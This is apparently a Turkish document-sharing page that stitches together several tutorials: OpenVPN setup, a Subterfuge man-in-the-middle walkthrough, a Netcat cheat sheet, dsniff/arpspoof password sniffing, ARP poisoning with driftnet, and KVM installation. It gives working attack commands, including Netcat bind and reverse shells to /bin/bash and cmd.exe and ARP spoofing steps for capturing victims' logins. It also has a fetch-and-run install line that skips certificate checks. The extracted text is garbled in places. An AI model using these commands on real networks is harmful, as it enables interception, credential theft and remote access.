Sonrasında bahsini ettiğimiz scripti çalıştıralım. Github linki burada.

Benzer belgeler
Data Link Katmanı olarak adlandırılır. Fiziksel adresleme bu katmanda yapılır.

Sonrasında bahsini ettiğimiz scripti çalıştıralım. Github linki burada.

Man In The Middle Attack Ve ARP Poisoning

Yum ile Paket Yönetimi

TCP/IP. TCP (Transmission Control Protocol) Paketlerin iletimi. IP (Internet Protocol) Paketlerin yönlendirmesi TCP / IP

HUAWEI Cihazlara Erişim Yöntemleri

Ağ Sızma Testleri ve 2. Katman Saldırıları Türk Standardları Enstitüsü Yazılım Test ve Belgelendirme Dairesi Başkanlığı

INHAND ROUTER LAR İÇİN PORT YÖNLENDİRME KILAVUZU

LİNUX İŞLETİM SİSTEMİNİN KÖPRÜ MODUNDA ÇALIŞTIRILMASI VE GÜVENLİK DUVARI İŞLEMLERİ

e-imzatr Kurulum Klavuzu

Kurumsal Güvenlik ve Web Filtreleme

Kurumsal Güvenlik ve Web Filtreleme

Web Servis-Web Sitesi Bağlantısı

SAMURAİ FRAMEWORK İLE HACKİNG-1 (FOOTPRINTING)

Smoothwall URL Filter Kurulumu

WebSiteDefender ile Web Uygulama Güvenliği

Windows Server 2012 DHCP Kurulum ve Yapılandırma

Denetim Masası/Programlar/Windows özelliklerini Aç/Kapat

AirTies Kablosuz Erişim Noktası (Access Point) olarak kullanacağınız cihazı bilgisayarınıza bağlayarak ayarlarını yapabilirsiniz.

BEUN VPN Hizmeti. VPN Nedir?

AirTies Kablosuz Erişim Noktası (Access Point) olarak kullanacağınız cihazı bilgisayarınıza bağlayarak ayarlarını yapabilirsiniz.

Kampüs Ağlarında Köprü-Güvenlik Duvarı (Bridge Firewall) ve Transparent Proxy

INTERNET BAĞLANTISININ KURULMASI İÇİN GEREKLİ YÖNLENDİRİCİ AYARLARI

SQL ALWAYS ON SİSTEMİNE YENİ CLUSTER NODE EKLENMESİ

Ağ Nedir? Birden fazla bilgisayarın iletişimini sağlayan printer vb. kaynakları, daha iyi ve ortaklaşa kullanımı sağlayan yapılara denir.

Free Cooling (Tibbo Ethernet Modüllü)

HAZIRLAYAN BEDRİ SERTKAYA Sistem Uzmanı CEH EĞİTMENİ

PERKON PDKS Kurulum ve hızlı başlangıç rehberi

VMware 4.0 vcenter Server Kurulumu

Erişim Noktası Ayarları

Güvenlik Duvarı ve İçerik Filtreleme Sistemlerini Atlatma Yöntemleri. Huzeyfe ÖNAL Bilgi Güvenliği AKADEMİSİ

Virtual Router Redundancy Protocol (VRRP)

3CX Phonesystem Türkçe Anonsları Windows ve Linux İşletim Sistemlerinde Aktif Etme

Bilgi ve Olay Yönetim Sistemi

AntiKor Güvenlik Sunucumu nereye yerleştirmeliyim?

Elektronik Belge Yönetim Sistemi Kullanım Kılavuzu

WAMP SERVER KURULUMU

AirTies Kablosuz Erişim Noktası (Access Point) olarak kullanacağınız cihazı bilgisayarınıza bağlayarak ayarlarını yapabilirsiniz.

XSS Exploitation via CHEF

İSTANBUL ÜNİVERSİTESİ MÜHENDİSLİK FAKÜLTESİ BİLGİSAYAR MÜHENDİSLİĞİ BÖLÜMÜ SİSTEM PROGRAMLAMA DERSİ. Öğr.Gör. Mehmet DEMİR

Saldırı Tespit ve Engelleme Sistemleri Eğitimi Ön Hazırlık Soruları

YAYGIN OLARAK KULLANILAN ADSL MODEMLER VE ROUTER AYARLARI

Program Kurulum. Turquaz Muhasebe. İçindekiler

Yerel Okul Sunucusu Uygulama Yazılımları Prototipi

Gazi Üniversitesi Mühendislik Fakültesi Bilgisayar Mühendisliği Bölümü. Bilgisayar Ağları Dersi Lab. 2. İçerik. IP ICMP MAC Tracert

Ağ Temelleri Semineri. erbil KARAMAN

BİLGİSAYAR AĞLARI VE İLETİŞİM

KULLANICI KILAVUZU: UEA FİX KULLANICILARININ SSLVPN ERİŞİMİ İMKB İÇİNDEKİLER

Ubuntu Terminal Server Ve Uzak Masaüstü Sunucusu

5651 ve 5070 Sayılı Kanun Tanımlar Yükümlülükler ve Sorumluluklar Logix v2.3 Firewall. Rekare Bilgi Teknolojileri

Windows Server 2012 Active Directory Kurulumu

BIND ile DNS Sunucu Kurulumu

Bilindik engelleme yöntemlerinin dışında olan, kurumsal web filitreleri nasıl aşılır?

UNIVERSAL REPEATER (TEKRARLAYICI/GENİŞLETİCİ MODU)

KALİ SUNUCUDA TOR, PROXYCHAINS, PRIVOXY, TOR- TUNNEL KURULUMU VE KULLANIMI

WiFi RS232 Converter Sayfa 1 / 12. WiFi RS232 Converter. Teknik Döküman

Windows XP Professional Kurulumu

FOUR FAİTH ROUTER LARDA IPSEC GÜVENLİ HABERLEŞME KILAVUZU

WINDOWS SERVER 2008 R2-SERVER 2012 DE IP SANALLAŞTIRMA

Anti-Virüs Atlatma 2. Kurulum

BTP 207 İNTERNET PROGRAMCILIĞI I. Ders 1

Clonera Bütünleşik İş Sürekliliği Gereksinimler ve Kurulum Dökümanı

Subnet A da bulunan DHCP Server makinesinin ve client makinenin IP yapılandırması aşağıdaki gibidir.

Güvenlik Araçları. Savunmadan çok saldırı ya yönelik araçlar. Amaç, saldırganlardan önce sistemdeki açıkları ortaya çıkarıp gereken önlemleri almak.

AirTies Kablosuz Erişim Noktası (Access Point) olarak kullanacağınız cihazı bilgisayarınıza bağlayarak ayarlarını yapabilirsiniz.

EC-485. Ethernet RS485 Çevirici. İstanbul Yazılım ve Elektronik Teknolojileri

Cyberoam Single Sing On İle

FTP ve Güvenlik Duvarları

İnsan http SSL/TLS TCP IP ARP

e-imzatr Kurulum Klavuzu

UBNT. UniFi mfi Ububntu. Ubuntu İşletim Sistemi ve UniFi/mFi Yazılımlarının Kurulumu

Ağ Projektörü Çalıştırma Kılavuzu

Armitage Nedir? Kullanım Öncesi

CELAL BAYAR ÜNİVERSİTESİ KÜTÜPHANE VERİTABANLARINA ÜNİVERSİTE DIŞINDAN ERİŞİM

7/24 destek hattı Kolay kurulum CD si Üç yıl garanti Üç yıl garanti YM.WR.5341.UM.TR.D01REV

Google Chrome Kullanıyorsanız; Microsoft Internet Explorer Kullanıyorsanız;

USB Keylogger İncelemesi

Elbistan Meslek Yüksek Okulu Güz Yarıyılı

JasperReports Server ve Ireport raporlama Sistemi Kurulumu / Kullanımı 1. Bölüm 2. Bölüm 1- JasperReports Server ve Ireport Nedir?

Örnek bir kullanım ve bilgisayar ağlarını oluşturan bileşenlerin özeti

Scream! e gelen veri akışlarından bazılarını diğer bir kurum yada bilgisayarla paylaşmak için kullanılabilir.

Anti-Virüs Atlatma 3. Kurulum

ProFTPD FTP Sunucusu. Devrim GÜNDÜZ. TR.NET Sistem Destek Uzmanı.

1. Bilgisayarınızda kullandığınız Web tarayıcı programını (Internet Explorer, Mozilla Firefox vb.) çalıştırınız.

WAP-3205 FirmWare Güncelleme Resetleme Universal Repeater Kurulumu CİHAZ ARAYÜZÜNE ERİŞİM

Öğrencilerin Canlı derslere katılması, * Sisteme giriş

Fiery Command WorkStation 5.8 ile Fiery Extended Applications 4.4

NEUTRON DDNS KURULUMU

IP NİZİ NASI GİZLERSİNİZ?

Vmware Esx Server Nedir Ve Ne İşe Yarar

Smartnet PRO-W Kullanım Kılavuzu

NP311. Genel. Uygulanışı. Datasheet NP311 device (terminal) server uygulaması

ÖNDER BİLGİSAYAR KURSU. Sistem ve Ağ Uzmanlığı Eğitimi İçeriği

Açık Kod VPN Çözümleri: OpenVPN. Huzeyfe ÖNAL

vsphere Client(viClient) ile ESXI Kontrolü

TCP / IP NEDİR? TCP / IP SORUN ÇÖZME

AĞ HĠZMETLERĠ MODÜLÜ 1. TAŞIMA KATMANI PROTOKOLLERİ

TL-WPS510U PRINT SERVER KURULUM DÖKÜMANI

Hızlı Kurulum ve Yapılandırma Kılavuzu

Transkript:

Linux Sunucuya Kurulumu ve İstemciden Bağlanma OpenVPN Windows VPN, engelli sitelere girmek veya görülmesini istemediğiniz trafiğiniz olduğu zaman işe yarar. Etrafta ücretsiz VPN ler çokca olsada bunların sunucularında duran logların başkalarına verilmediğini veya trafiğinizin ne kadar güvende olduğunu bilemezsiniz. Bu yüzden bu yazıda kendi server ımıza OpenVPN kurulumunu kısaca yazacağım. (Ben DigitalOcean dan kiraladığım VPS ime Debian 7.0 x64 kurdum ama Ubuntu ve CentOS ta da çalışır.) OpenVPN kurulumu ile ilgili yazılar aradığınızda (How to install openvpn on blabla) çokca uzun ve kurarken canınızdan bezmenize neden olabilecek bir ton olay göreceksiniz. Bunun böyle olduğunun farkına varanlar sağolsunlar işi bir bash script yazarak halletmişler. Ki bunu Github ta forklayan da 300 ün üstünde kişi var, yani OpenVPN den biz çektik siz çekmeyin diyip geliştirmeye yardım etmişler. Kurulum Önce sistemimize update & upgrade yapıyoruz. apt-get update && apt-get upgrade Sonrasında bahsini ettiğimiz scripti çalıştıralım. Github linki burada. Sağolsunlar yazdıkları küçük bir komut zinciri ile Github a uğramamızada gerek kalmıyor. wget git.io/vpn --no-check-certificate -O openvpn-install.sh; bash openvpn-install.sh Bu satırı komut satırımıza girdiğimizde bash scripti indirip

çalıştıracak ve bize server IP imizi soracak. Kendisi zaten IP adresimizi bulduktan sonra soruyor, teyit ettirmek için yani. Sonrasında OpenVPN için hangi porttan dinleme yapacağını soruyor. Buraya da OpenVPN için default port numarası olan 1194 değerini girip bize soruyor. Bunu herhangi bir değere set edebilirsiniz. Sonrasında sorduğu soruları uzatmadan enterlayıp geçiyoruz ki kendisi defaultta n vermiş. Sonrasında hangi DNS i kullanmak istediğinizi soruyor. Sistemin kullandığı DNS i kullanmasını söyleyip 1 diyoruz. Ardından gerekli ayarlamaları yaptığı sırada bağlanacağımız client için bir isim soruyor. Default olarak client denmiş. Ben bunu Gundy olarak değişiriyorum ve geçiyorum.

Sonrasında konfigürasyonlar için alacağı bilgileri bitirdi ve bizden devam için bir tuşa basmamızı istiyor. Ve önce kurulum, ardından konfigürasyonları yapıyor. Bunlardan biri bağlanmamız için gereken 2048 bitlik RSA Private Key. Anahtarı ürettikten sonra servisleri yeniden başlatacaktır ve kullanıma hazır hale gelecektir. Windows makinemizden OpenVPN client ıyla bağlandığımız sırada kullanacağımız gerekli bilgileri içeren konfigürasyon dosyası ana dizinimizde, ayarlamalar sırasında belirttiğimiz kullanıcı ismimizle oluşturulmuş ve bizi bekliyor. WinSCP veya benzeri bir uygulama ile server dan ovpn uzantılı dosyamızı çekiyoruz. Bu dosyayı OpenVPN in kurulu olduğu

dizindeki config klasörünün altına atıp OpenVPN istemcimizi çalıştırıyoruz. Yönetici olarak çalıştırmayı unutmayın! Tabi çalıştırdığımız zaman küçük bir ikon haline gelip görev çubuğunda görünüyor.sağ tıklayıp Bağlan diyoruz ve bağlantının oluşturulmasını bekliyoruz. Ardından bağlantıyı sağlamaya çalışıyor TLS paketleri yollayıp alıyor.

Ve bağlantı kurulduğu zaman bize bağlandığımız network ten atanan IP ile beraber bildiren bir uyarı çıkıyor. (Yapacaklarınız bekleme süresiyle beraber 3-5 dakika.) Subterfuge ile Man in The

Middle Attack Man in the middle saldırıları, saldırganın hedefindeki bilgisayarla diğer bilgisayar veya bilgisayarların ağdaki tüm veri trafiğini kendi üzerine alması yoluyla yaptığı saldırı tipidir.bu tür bir saldırıyı yapmak için temel düzeyde Layer 2 (Physical Layer) ve Layer 3 bilgisi yeterlidir. Layer 2, Data Link Katmanı olarak adlandırılır. Fiziksel adresleme bu katmanda yapılır. Layer 3, Network Katmanı, işte bu katman ip lerden oluşur, ip blokları ile tanımlanmış ağlar arasındaki veri iletişimi bu katmanda sağlanır. Layer 2 de çalışan switch mantığı; Switch herhangi bir porttan gelen bir ağ paketini alır. Aldığı paketin mac adresi anahtarın mac adres tablosu nda yoksa bunu mac adres tablosuna ekler. Aldığı paketin hedef mac adresini kendi mac adres tablosunda arar, eğer kendi mac adres tablosunda var ise bu paketi ilgili porttan gönderir. Eğer yoksa hiç bir şey yapmaz. (Drop edilir.) Not: Mac adres tablosu, mac adreslerini anahtarın portları ile

ilişkilendirildiği tablodur. Bu tablo ile hangi mac adresine anahtarın hangi fiziksel hangi portundan ulaşılabildiğine bakılabilir. Bazen arp tablosu ile karıştırılabilir, arp tablosu mac adreslerinin ipler ile ilişkilendirildiği tablodur. Mac Adres Tablosu 00:00:00:00:AA:AA FastEthernet 0/0 00:00:00:00:BB:BB FastEthernet 0/0 00:00:00:00:CC:CC FastEthernet 0/1 Arp Tablosu 00:00:00:00:AA:AA 192.168.1.1 00:00:00:00:BB:BB 192.168.1.2 00:00:00:00:CC:CC 192.168.1.3 Peki örneğin 192.168.1.3 ip li bilgisayar, 192.168.1.2 ip li bir bilgisayar ile iletişimi geçmek isterse ne yapar? Layer 2 de bilgisayarlar birbirleri ile iletişime geçmek için mac adreslerini kullanırlar, IP ler ise Layer 3 te işimize yarar. Yani aynı ağdaki 2 bilgisayar iletişime geçmek için birbirlerinin mac adreslerini bilmek zorundadırlar. Sorunun cevabına gelince; 192.168.1.3 ipli bilgisayar kendi arp tablosuna bakar, 192.168.1.2 ipli bilgisayar arp tablosunda varsa arp time out süresi içinde zaten bu bilgisayar ile bir iletişime geçilmiş demektir. Eğer yok ise bu bilgisayar ile henüz bir görüşme sağlanmamış demektir yani bağlantı için ilk adıma geçilir. Bu da arp request broadcast paketini göndermekle başlar. Arp request paketi ağdaki tüm bilgisayarlara iletilir ve sorar 192.168.1.2 kim? 192.168.1.2, bu arp sorusuna benim diye cevap verir ve bu cevabın içinde de kendi mac adresi vardır. 192.168.1.2 den gelen cevabı alan 192.168.1.3 ipli bilgisayar artık 192.168.1.2 ipli bilgisayarın mac adresini biliyor, yani

onunla iletişime geçmek için yeterli bilgisi var. Göndermek istediği paketin kaynak mac adresine kendi mac adresini, hedef mac adresinin yerine ise 192.168.1.2 ipli bilgisayarın mac adresini ekleyerek paketi gönderir. Tam bu noktada eğer biz 192.168.1.3 ü yanıltır ve 192.168.1.2 nin mac adresi o değil bu diyerek kendi mac adresimizi yazarsak ne olur? Paket bize gönderilir. Peki, aynı paketi alıp 192.168.1.2 ye biz göndersek ve yanıt bize gelse bizde aldığımız cevabı tekrar 192.168.1.3 e gönderirsek ne olur? 192.168.1.3 ün 192.168.1.2 e gönderdiği tüm verileri kendi üzerimize almış oluruz ve eğer 192.168.1.2 bu ağda internete çıkmak için kullanılan modem, router, proxy veya benzeri bir cihaz ise 192.168.1.3 ün bütün internet faaliyetleri bizim kontrolümüz dahilinde gerçekleşir. Subterfuge ile MITM ın nasıl yapıldığını görelim > SETUP (Kurulum) Kali makinasında Subterfuge un en son sürümünü indiriyoruz; $ wget https://subterfuge.googlecode.com/files/subterfuge_1.0-1_all.d eb Komutu yazarak yükleme işlemi yapıyoruz; $ dpkg -i subterfuge_1.0-1_all.deb Subterfuge a bağlı olan şeyler var ise onları da update ediyoruz. $ apt-get update && apt-get -f install Subterfuge u çalıştırıyoruz. $ subterfuge

Sonra tarayıcımızdan 127.0.0.1 e giderek Subterfuge arayüzüne ulaşıyoruz. Arayüzde Settings kısmına tıklıyoruz ve ekrandaki ayarlamaları yapıyoruz. Sonrasında MITM Vectors istediğimiz adresini yazıyoruz. sekmesine tıklayarak zehirlemek IP

Sonra Modules sekmesine tıklayarak Network View e tıklıyoruz ve Apply tuşuna basıyoruz. IP adresi 192.168.4.67 olan kurban (victim) Linux makinayı görüyoruz. Burada Scan tuşu ile açık olan portları görebiliriz. Kontrol etmek istediğimiz saldırı türünüde istersek Controls kısmındaki simgelerden(http Injection,DoS Attack vs.) gerçekleştirebiliriz.kurban bilgisayardaki kişi eğer login olarak herhangi bir yere giriş yapıyor ise o bilgiler bizim elimize ulaşmış oluyor.

Siteye yaptığı girişin session bilgileri de elimize ulaşıyor. Mesela kurban bir siteye giriş yapsın. Ve bu bilgiler, log in tuşuna bastıktan sonra bizim Subterfuge ekranımıza düşmüş oluyor. Bu şekilde router ve kurban bilgisayar arasında MITM saldısını gerçekletirmiş oluyoruz. Netcat Kullanımı Bu doküman, Netcat in hem Linux hem de UNIX sistemlerdeki çeşitli kullanım şekillerinden bahsetmektedir. Temel Kullanım : Basit Netcat Istemci #nc [Hedef IP] [Port] Vermiş olduğunuz hedef IP nin yine vermiş olduğunuz porta bağlantı kurar. Basit Netcat Dinleyici #nc l p [localport]

Yerelde verdiğiniz portta Netcat dinleyici kurar. Netcat Komutları #nc [options] [Hedef IP Adresi] [port/lar] [Hedef IP Adresi] kısmı basit olarak karşı tarafın IP adresi ya da domain adıdır. -l : Listen mod ( dinleme modu ) (varsayılan olarak istemci moddadır) -L : Listen harder (yalnızca Netcat in Windows versiyonu için desteklidir. Bir istemci bağlantısı koptuktan sonra tekrar dinlemeyi otomatik başlatmak amacıyla Netcat e kalıcı bağlantı sağlar.) -u -p : UDP mod (varsayılan TCP) : Yerel port (Dinleme modunda bu port dinlenir, istemci modda porttur.) -e yarar. ise bütün paketlerin gönderildiği : Kurulan bağlantıdan sonra program çalıştırmaya n : DNS sorgusu yapmaması için kullanılır. -z : Zero I/O mod (Hiçbir very göndermez) -wn kaynak :Bağlantı timeout, STDIN kapandıktan sonra N saniye bekler.bir Netcat istemci veya dinleyici bu komut ile bağlantı kurması için N sn bekler. Eğer bu süre zarfında bağlantı gerçekleşmezse Netcat çalışmayı durdurur. -v :Ayrıntılı modu. Meydana gelen Standart Error hatayı ekrana yazdırır. -vv :Daha Ayrıntılı modu. Standart Error hakkında daha fazla ayrıntı yazdırır.

Netcat Windows Kullanımı : İstemci den Dinleyici ye Aktarım C: \> echo nc [Hedef IP] [Hedef Port] > deneme.bat C: \> nc l p [YerelPort] e deneme.bat YerelPort dan Hedef IP nin Hedef Portuna kurulan bağlantı ile paketler gönderilir. Dinleyici-Dinleyici Aktarım C: \> echo nc l p [YerelPort2] > deneme.bat C: \> nc l p [YerelPort1] e deneme.bat YerelPort1 de kurulan bir bağlantı ile YerelPort2 ye paket gönderimi şeklinde bir aktarım oluşturulur. İstemci-İstemci Aktarım C: \> echo nc [Sonraki IP] [Port 2] > deneme.bat C: \> nc [Önceki IP] [Port 1] -e deneme.bat Önceki IP nin Port 1 inden Sonraki IP nin Port 2 sine paket gönderimi ile aktarım olur. Dosya Transferi İstemciden Dinleyiciye Dosya Gönderme #nc l p [Yerel Port] > [giden dosya] Yerel Port dinlenir ve giden dosya çıktısı yüklenir. #nc w3 [Hedef IP] [Hedef Port] < [gelen dosya] gelen dosya Hedef IP nin Hedep portuna push edilir. Dinleyici den İstemci ye Dosya Çekmek #nc l p [Yerel Port] < [gelen dosya]

Yerel Port dinlenir ve gelen dosya push etmeye hazırlanır. #nc w3 [Hedef IP] [Hedef Port] > [giden dosya] Hedef IP nin Hedef Portu ile bağlantı kurulur ve giden dosya çekilir. TCP Port Tarayıcı IP Adresin Port Taraması #nc v n z w1 [Hedef IP] [Başlangıç portu]-[bitiş portu] Belirtilen port aralığında hedef IP ye n (isimleri çözmeden) z (herhangi bir data göndermeden) w1 Bağlantı kurmak için 1 sn den daha fazla beklemeden port taraması gerçekleştirme işlemine başlar. TCP Banner Grabber Linux IP adresine üzerinde çalışan TCP servislere Banner Grabbing #echo nc v n w1 [Hedef IP] [baş. port]- [bitiş Port] Backdoor Shell Linux da backdoor shell dinleme #nc l -p [Yerel Port] e /bin/bash Windows da backdoor shell dinleme C: \> nc l p [Yerel Port] e cmd.exe Tersine backdoor shell dinleme (Linux) # nc [Senin IP adresin] [port] e /bin/bash Tersine backdoor shell dinleme (Windows) C: \> nc [Senin IP adresin] [port] e cmd.exe

OS X Dsniff Kullanımı Dsniff nedir? Bu program gelişmiş bir şifre sniffer dır. Birçok protokolü tanır, TELNET, FTP, SMTP, Post Office Protocol (POP), Internet Message Access Protocol (IMAP), HTTP, CVS, Citrix, Server Message Block (SMB), Oracle ve daha fazlasını içerir.diğer sniffer lar gibi değildir, örneğin Wireshark tekil paketler ve bağlantı hakkında çok fazla ve detaylı bilgi verir eğer sizin tek istediğiniz şifre ve kullanıcı adı ise dsniff kullanabilirsiniz. Ayrıca bu kurulumla yüklenecek araçlar: Filesnarf, Mailsnarf, Msgsnarf, Urlsnarf, ve Webspy,Arpspoof 1. Komut satırına öncellikle aşağıdaki komutu yazıyoruz. xcode-select install Öncellikle yukarıdaki komut ile eksik araçlarını yüklemeniz gerekmektedir. olan geliştirici OS X Dsniff Kurulumu: 1. MacPorts un size uygun olan versiyonunu indirin ve kurun. (MacPorts İndir) 2. Terminal açın ve aşağıdaki kodu çalıştırın> port install dsniff Dsniff ile Man in the Middle Attack: Uygulayacağımız Adımlar >

1. 1.İP Yönlendirme: OSx için: sudo sysctl -w net.inet.ip.forwarding=1 Linux için: echo 1 > /proc/sys/net/ipv4/ip_forward 1. 2.Arpspoofing. 2. İki tane terminal açın ve aşağıdaki komutları ayrı ayrı çalıştırınız. 1.Terminal için: arpspoof -i en0 -t KurbanIP BizimIP 2.Terminal için: arpspoof -i en0 -t BizimIP KurbanIP 1. 3.Dsniff ile Şifre ve Kullanıcı adlarını çekmek: 2. A ş a ğ ı d a k i K o m u t i l e o t o m a t i k o l a r a k K u r b a n ı n Bağlantılarını dinleyerek sizin için şifre ve kullanıcı adını çekecektir. dsniff -i en0 Not: İnterface kısmına en0 OSx için yazdım siz linux kullanıyorsanız eth0 yapmalısınız, bilgisayarınızın ethernet card ına göre değişir. Man In The Middle Attack Ve ARP Poisoning ARP POSINING ARP Poisoning, ARP zehirleme anlamına gelmektedir. ARP protokolünün temel çalışmasındaki zaafiyetleri kullanarak

gerçekleştirilir. ARP (Adress Resolution Protokol), Layer 2 katmanının ana protokolüdür. Yerel ağlarda iletişim bilindiği üzere IP adresleri üzerinde değil, MAC adresleri üzerinden gerçekleştirilir. Bunun için her cihaz, iletişime geçmek istediği cihazın (internete çıkarken DSL modem dahil) MAC adresini bilmek zorundadır. Bu sebeple, Layer 2 katmanında, iletişim öncesinde ARP protokolü devreye girer, Arp request ve Arp reply paketlerini kullanarak, IP si bilinen cihazın MAC adresini bulur, daha sonra MAC adresleri üzerinden iletişim sağlanır. ARP Zehirlenmesi Çeşitleri ARP zehirlenmesi adı verilen saldırılar yerel ağlarda gerçekleştirilen saldırılardır. ARP saldırılarının yerel ağlarda yapılmasının sebebi ise MAC adresinin yerel ağ dışına gönderilmemesidir. Yerel ağda MAC adresi bilgisi o ağda yer alan swicth ve yönlendirici gibi elemanlara gönderildiği için saldırgan MAC adresi bilgisine ulaşabilir. Buradaki güvenlik açığını kullanarak, ARP tabloları üzerinde istediği değiştirmeleri yapabilir. ARP zehirlenmesi üç şekilde gerçekleştirilmektedir. 1. Hedef Bilgisayarın ARP tablosunu doldurarak 2. Ortadaki adam yöntemiyle 3. Hedef Bilgisayarın Paketlerini Başka Bir Bilgisayara Göndererek gerçekleştirilir 1.Hedef Bilgisayarın ARP tablosunu Doldurma Burada saldırgan hedef bilgisayarın ARP tabloları üzerinde doğrudan değişiklikler yapar. Örneğin; saldırgan hedef bilgisayarın ARP tablosunu yanlış bilgilerle doldurur ve hedef bilgisayarın göndereceği paketlerin saldırganın belirttiği adreslere gitmesini sağlayabilir. Bu yöntemle gönderilmek

istenilen paketin, istenilen yere ulaşması engellenebilir. 2.Ortadaki Adam Yöntemi (Man in the Middle) Bu yöntemde saldırgan, hedef bilgisayar kurban bilgisayarın ulaşmak istediği noktanın arasına girer. Bütün iletişimi istediği gibi kontrol eder. Ağda gönderilen bir paketi alıp, paketin destination MAC adres bilgisine kendi MAC adresini yazar. Pakete yapılan bu müdahele ile artık yollanan paketler saldırganın bilgisayarına gider. Saldırgan da paket üstünde istediği gibi değişiklik yapabilir. Bu yöntemle kullanıcının yolladığı tüm bilgiler saldırgan üzerinden geçer ve bu yöntem oldukça tehlikelidir. Tüm gönderilen bilgiler (kredi kartı bilgileri, şifre vb.) alınabilir. Bu yöntem ARP poisining dışında pek çok saldırılarda da kullanılmaktadır. En fazla kullanılan saldırı çeşitlerindendir. 3. Hedef Gönderme Bilgisayarın Paketlerini Başkasına Burada da saldırgan hedef bilgisayarın göndereceği paketi başka bir bilgisayara gönderebilir. Örneğin kullanıcının HTTP (İngilizce Hyper-Text Transfer Protocol, Türkçe Hiper Metin Transfer Protokol) üzerinden erişmek istediği web sayfası yerine kendi oluşturduğu sayfaya kullanıcıyı götürebilir. Bu şekilde bilgisayar servis dışı bırakılabilir. Bu makalede Arp Poosining saldırı çeşitlerinden ortadaki adam (mitm) saldırısı nasıl yapılır bir örnek verilerek anlatılacaktır. Senaryo da bir saldırgan kali makinası ve birde kurban başka bir kali makinası olacaktır. Aşağıdaki resimde saldırgan kali bilgisayarın ip si ve interface görünüyor.

Kurban kali ise aşağıdaki gibi olacaktır. 129 ip li kali saldırgan 131 ip li kali kurban makinasına arp spoof yapmaya başlayacak. Yukarıdaki resimlerde görüldüğü üzere ilk önce hangi portları dinleyeceğimizi belirtiyor sonrasında ise kurban bilgisayarın ip sini ve gw bilgilerini girip arp reply paketlerini göndermeye başlıyoruz. Aşağıdaki komut kurban makinanın internet trafiğini dinlemek için yazılan bir komuttur. Görüldüğü üzere belirtilen portlardan kurban dinlemeye başlanılır.

Buradan sonrasında kurban bilgisayarın internete girmesi beklenir. Eğer istenilirse aşağıdaki komutta olduğu gibi driftnet komutunu girilerek kurbanın girdiği internet sitelerinin ekran görüntülerini de kaydedebilir. Bu aşamadan sonra kurban bilgisayardaki kullanıcının internete erişimi beklenilir. Kurban bilgisayar mynet.com adresine girmiş bulunmakta bundan sonrasında ise bir önceki yazılan komuta dönüş yapılarak aradaki dinlenilen trafik incelemeye alınır.

Kurban kali (192.168.1.131) bilgisayarın mynet.com girmesiyle trafik akışı karşımıza gelmiş oldu. Burada kurban bilgisarın hangi browser i kullandığı, hangi işletim sistemi ve hangi url leri ziyaret ettiğine kadar bilgiye sahip olabilirsiniz. Driftnet komutu ile görüldüğü gibi kurbanın ziyaret etmiş olduğu sitelerin ekran görüntüleri alınmış oldu. Bura da ise hangi resimlerin kaydedildiği görülmektedir.

KVM nedir? Nasıl kurulur? En basit tanımıyla KVM Çekirdek Makina (Kernel Based Virtual Machine) dır. Temelli Sanal Yurt dısı veya içinden satın alacağız VPS makinelerinin kurulu olduğu fiziksel makinelerin bir çoğu da alt yapı olarak kvm kullanmaktadır. Normalde VmWare,Virtualbox ile yaptığımız sanallaştırmanın nesi vardı da çıktı bu KVM? Küçük bir araştırma yaptıktan sonra bu soruya cevap bulmak çok da zor olmasa gerek. KVM ile sanallaştırma kernel seviyesine inmiştir. Önceden işletim sistemi sistemi üzerinde bir uygulama gibi çalışan VMWare gibi sanallaştırma çözümlerinin yavaş olması ve pek çok konuda ana işletim sistemine muhtaç olması istenmeyen bir durumla kullanıcıyı yüz yüze bırakmaktadır. Hypervisor gibi teknolojiler ile bazı sorunların üstesinden gelmeye çalışsalar da bu çözümler başka sorunları da ortaya çıkarmıştır. Geliştirilen KVM ile bu konularda önemli adımlar atılmıştır. Kvm ile sanal makinanın hızı neredeyse ana makinadaki işletim sisteminin hızı ile aynıdır. Kernel düzeyinde bir sanallaştırma sadece ekonomik olarak değil,güvenlik ve süreklilik gibi konularda da kullanıcı dostu bir sanal işletim sistemi sunmaktadır. Bilgisayarın tüm donanım haklarına erişebilen bir yapı tabi ki oldukça güçlüdür.yani VMware gibi sizin bir malikane sahibi olduğunuzu varsayıp o malikenin sadece bir odasını kullandırmak yerine size malikaneyi vaadediyor. Nasıl Kurarım? Öncelikle kuruluma başlamadan önce bilgisayarımızda BIOS ayarlarına girip anakarttımızın virtualisation özelliğinin enabled olmasına dikkat edelim ki benim gibi tüm gün neden

hata veriyor bu program demeyelim.:) 1.Benim işlemcim sanal makine için yeterli mi? Sizde takdir edersiniz ki tek çekirdekli bir makineye sanal makine kurmak pek de önerilen birşey değil(kurabilen varsa beri gelsin).peki benim makinem kaç cekirdek CPU durumu ne sorusuna cevap alacağımız aşağıdaki komutu giriyoruz. egrep (vmx svm) color=always /proc/cpuinfo grep vmx Bu komutun cıktısında birden fazla sayıda vmx yazısı görüyor iseniz kullandığınız cihaz sanallaştırma için uygun demektir. 2.Kurulum Bu post kvmnin ubuntu ve debian sistemlere nasıl kurulacağını anlattığından apt kullanıyor olacağız.aşağıdaki komutla gerekli paketlerin kurulumunu yapıyoruz. apt-get install qemu-kvm libvirt-bin bridge-utils virtmanager virtinst kvm 3.Gerekli Kullanıcı ve grupların eklenmesi Şimdi kendimizi programı kullanacak kullanıcı olarak ekliyoruz. Misal ben kendi bilgisayarımda dimakoci kullanıcısıyım.vereceğim komut adduser dimakoci adduser dimakoci libvirtd(debian sistemlerinde burada vermemiz gereken komut adduser dimakoci libvirt) adduser dimakoci kvm Bu adımlardan sonra sistemden log out olup tekrar giriş yapmamız gerekmekte. 4.Adım Kontrol Bu aşamaya gelmeden önce yukarıdaki adımları eksiksiz olarak yaptınız ve herhangi bir hata almadınız ise kvm yi sisteminize

kurmuşsunuz demektir.şimdi kontrol edelim.sistemin kurulup kurulmadığını anlamamızın bir çok yolu vardır.ben tek aşamada aşağıdaki kodu kullanarak bu işi yapıyorum. virsh -c qemu:///system list Ayrıca virsh ve akabinde list komutu vererek de aynı işlemi yapmış olursunuz. Bu aşamadan sonra Kvm kullanıma hazır.isterseniz terminalden virt-manager yazarak,isterseniz menu>system>virtual machine manager a tıklayarak çalıştırabilirsiniz